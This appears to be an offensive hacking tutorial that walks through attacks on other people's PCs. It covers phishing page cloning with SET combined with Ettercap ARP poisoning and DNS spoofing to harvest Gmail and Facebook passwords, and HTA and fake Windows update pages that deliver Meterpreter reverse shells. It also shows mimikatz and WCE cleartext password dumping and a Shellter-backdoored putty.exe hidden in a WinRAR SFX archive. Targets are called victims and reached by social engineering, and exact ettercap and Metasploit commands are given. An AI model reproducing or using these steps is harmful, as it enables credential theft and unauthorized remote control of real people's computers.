Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit.

First open your kali Linux application tab in Exploitation Tools and then chose SET Toolkit

Now choose option 1, “Social – Engineering Attacks” and Enter

Then choose option 2, “Website Attack Vectors” and Enter

After that choose option 3, “Credential Harvester Attack Method” and Enter

Now choose option 2 Site Cloner and press Enter

For Post back type your IP address and press Enter, After that type the website name you want to be Clone (in my case I am using gmail )

Cloned web page will be saving in /var/www Folder. As shown below.

Now move cloned files of fake page (e.g. Harvester, post & index.html) in /var/www/html folder.

Now right click on harvester .txt file and give read and write permission.

Now open etter.dns file which is in /etc/ettercap folder.

Modify the contents of the etter.dns and add your own pc IP address as A record.

Now Open Ettercap and go to Sniff and choose Unified sniffing.

Select you network interface (in my case interface is eth0)

Now go to hosts and select Scan for hosts. It will show you the connected PC in your network.

Select host list and select your Target after that click on Add to Target 1 (if you want to select more than 1 target then select the target again and click on Add to Target again )

Open Mitm option and select ARP poisoning...

It will give you a Pop up in which select the Sniff remote connection box and hit OK.

Select Plugins and choose Manage the plugins.

IN Plugins option double click on dns_spoof. (It will start DNS spoofing)

Click on start and select Start sniffing

Now, when the victim will open any web page, the page will redirect it to the Fake page you created.

When victim will put there Id & Password, will get all the details.

The Hacked ID & Password of Victim will get saved in /var/www/html/harvester.txt. As shown below.

Hack Remote PC using HTA Attack in SET Toolkit

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

First open your kali Linux application tab in Post Exploitation chose SET Toolkit

Now choose option 1, “Social – Engineering Attacks”

Now choose option 2, “Website Attack Vectors”

Now choose option 8, “HTA Attack Method”

Enter the IP address to connect back on: 192.168.0.125 (IP address of Your PC)

Now select the payload I choose 1 Meterpreter reverse TCP.

Now we will choose option 2, “Site Cloner and type the site name you want to be clone. Nad starting MSF listener automatically

Now you will get index.html and launcher.hta in /var/www directory.

Now move both file to var/www/html directory.

Now convert your URL into Bitly URL using bit.ly and send this link address to your victim via Email or Chat

When Victim Machine browsing to bitly URL it will ask you for Prompt to keep/Discard

Now you will get the meterpreter of victim PC. Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

Hack Windows Password in Clear Text using Mimikatz and Windows credential Editor

mimikatz is a tool to check Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

First Download mimikatz windows version from here. and right click on it & Run it as Administrator.

It will open mimikatz windows.

Type the following command to check  privilege

privilege::debug

Now type the following command to get users passwords in text mode.

sekurlsa::logonPasswords

Windows Credential Editor

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and clear text passwords).

First Download WCE from here.

Go to WCE directory & execute the following command as Administrator. And run the following command

 wce.exe -w It will show the password in plaintext

Hack Remote PC using WinRAR SFX Remote Code Execution Vulnerability

Remote code execution vulnerability has been discovered in the official WInRAR SFX v5.21 software.The vulnerability allows remote attackers to unauthorized execute system specific code to compromise a target system.

The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate own compressed archives with malicious payloads to execute system specific codes for compromise the attackers .

Download Shellter from here, shellter version is latest release, no antivirus has detected till now. After downloading shellter unzip the archive file

Set the location of shellter and type “wine shellter.exe

A terminal opens and choose operation mode as auto (a)

Now choose an executable file and copy to shellter folder to bind the shellter with any .exe file
here in my case I have copied putty.exe as a file to bind with shellter.exe

Note: only executable file can be binded

Now it asks for PE target after choosing operation method, give the filename .exe and binding process will start.

When prompted to enable stealth mode enter “Y”

When the binding is processed it will ask for the type of payload we want to use I have choose l for listed payload and then choose 1 for Meterpreter_reverse_tcp

Now give the lhost which is ip address of kali linux and lport as 4444

After giving all the options you will get a confirmation like Injection: verified! Press enter to continue.

Now you will get encrypted putty.exe file in shelter directory.

Move Putty.exe file to var/www/html directory.

Start apache services.

Now patch putty.exe path in winrar utility tool. Right click on winrar . Select add to Archive option.

Select Create SFX archive option. 

Select on Advanced and click on SFX options.

Now Select Text and Icon option and type the path of putty.exe file with iframe tag follows.

   Click on OK.

Now send this Winrar file to victim PC using any Social Engineering Technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.5

exploit

Now send your putty.exe files to victim using any social engineering technique. Now when the victim will use putty you will get the meterpreter of victim PC.

Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit

First of all, go to Kali Linux Home directory. Move to etc /ettercap directory.  Now edit etter.dns File.

Modify the contents of the etter.dns and add your own pc IP address as A record.

Now run the following command with victim pc IP address to spoof the victim pc.

ettercap  –i  eth0 –T  –q  –P  dns_spoof  -M  ARP  /192.168.0.103.//

It will activate dns_spoof plug-in.

Open terminal and type msfconsole to open metasploit

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Now copy this Powershell.exe code and save as update .bat file.

Now create a fake website page showing windows security update message. In webpage, give the hyperlink as update.bat file.

Now save this webpage as index.html and paste it in directory /var /www/html.

Now start   Apache    server .write following command. Service   Apache2   start.

When the victim will open any web, this page showing windows security update message will displayed.

When victim will click on download update link & save the batch file. The batch file will execute automatically.

Now you will get the control of victim PC. Now type the following command. Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.